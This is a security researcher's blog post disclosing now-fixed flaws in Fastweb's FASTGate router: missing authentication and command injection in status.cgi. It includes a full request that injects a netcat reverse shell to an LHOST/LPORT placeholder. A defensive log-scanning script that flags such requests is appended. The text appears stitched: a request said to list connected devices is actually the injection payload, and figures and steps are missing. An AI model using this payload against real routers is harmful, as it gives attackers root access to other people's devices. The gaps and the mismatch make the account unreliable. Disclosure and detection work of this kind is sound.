
This blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunication company, to its clients.

Thanks to these vulnerabilities I was able to bypass the authentication layer as well as execute arbitrary code via command injection and get a reverse shell back to the router.

All vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware.

FASTGate: the latest generation modem from Fastweb

Fastweb [1] is an Italian telecommunications company that provides internet services.

Since around March 2017 the company started to ship a new modem to its clients: the FASTGate [2].

Working as a penetration tester, and having the possibility to test it out, I started to analyze its web interface in order to find some vulnerabilities that could give me some unintended access to it.

Goal of the night: popping up a shell!

First step was to set up Burp Suite as a proxy and navigate a bit through the webpages to save some requests and responses. The first screen I got was the login panel, as shown in figure 1.

I logged in and started to browse some pages and execute actions in order to understand how requests were handled. The first thing I noticed was that the login request did not return any cookie nor any token to the client and this made me suspicious: did they implement some authentication at all?

What I noticed was that the web application was simply sending AJAX requests to a cgi binary, called status.cgi, using a parameter called nvget to specify the action.

For example, the following GET request was enough to list all devices connected to the router, even in the past, with their assigned IP, their MAC address and their hostname:

```
GET /status.cgi?cmd=3&nvget=login_confirm&password=AA'$(`/statusapi/usr/bin/nc%20LHOST%20LPORT%20-e%20/bin/bash`)AAremember_me=1&username=admin HTTP/1.1
```

This was enough to get a full reverse shell into the system, and guess what? The process is running as root so we get full access to the device.

Figure 4 - Exploit executed to get a shell

For documentation purposes, the vulnerable software version that I tested is the v1.0.1b, with firmware version 0.00.47_FW_200_Askey 17:31:59.
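A defender-side check for the request pattern in this post, as an added example that is not part of the original post: it scans access-log lines for status.cgi requests whose decoded parameters contain shell syntax. The log layout, the benign sample lines and the function names are assumptions, and the pattern list goes slightly beyond the post's `$(` and backticks by also covering chaining operators.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an access-log entry (the log layout is an assumption).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Shell syntax with no place in a status.cgi parameter: command substitution
# (backticks, $( or ${) plus chaining with ; | && or a newline.
SHELL_SYNTAX = re.compile(r"`|\$[({]|[;|\n]|&&")

# Constructed sample log. Line 2 carries the request from the post, with its
# LHOST/LPORT placeholders; lines 1 and 3 are made-up benign logins.
SAMPLE_LOG = """\
192.168.1.10 [t1] "GET /status.cgi?cmd=3&nvget=login_confirm&password=hunter2&remember_me=1&username=admin HTTP/1.1" 200
192.168.1.66 [t2] "GET /status.cgi?cmd=3&nvget=login_confirm&password=AA'$(`/statusapi/usr/bin/nc%20LHOST%20LPORT%20-e%20/bin/bash`)AAremember_me=1&username=admin HTTP/1.1" 200
192.168.1.10 [t3] "GET /status.cgi?cmd=3&nvget=login_confirm&password=pa$$word&remember_me=1&username=admin HTTP/1.1" 200
"""


def suspicious_params(log_line):
    """Return sorted names of status.cgi parameters whose decoded value
    contains shell syntax. Only names are returned, never the raw values."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/status.cgi"):
        return []
    # parse_qsl percent-decodes each value, so %20 or %60 cannot hide syntax.
    pairs = parse_qsl(url.query, keep_blank_values=True)
    return sorted({name for name, value in pairs if SHELL_SYNTAX.search(value)})


def scan(log_text):
    """Return (line_number, parameter_names) for every line that trips the check."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        names = suspicious_params(line)
        if names:
            hits.append((number, names))
    return hits


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: shell syntax in parameter(s) {', '.join(names)}")
```

A lone `$` in a password, as in the third sample line, is not flagged; a password containing `;` or `|` would be, so treat hits as triage input rather than proof.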
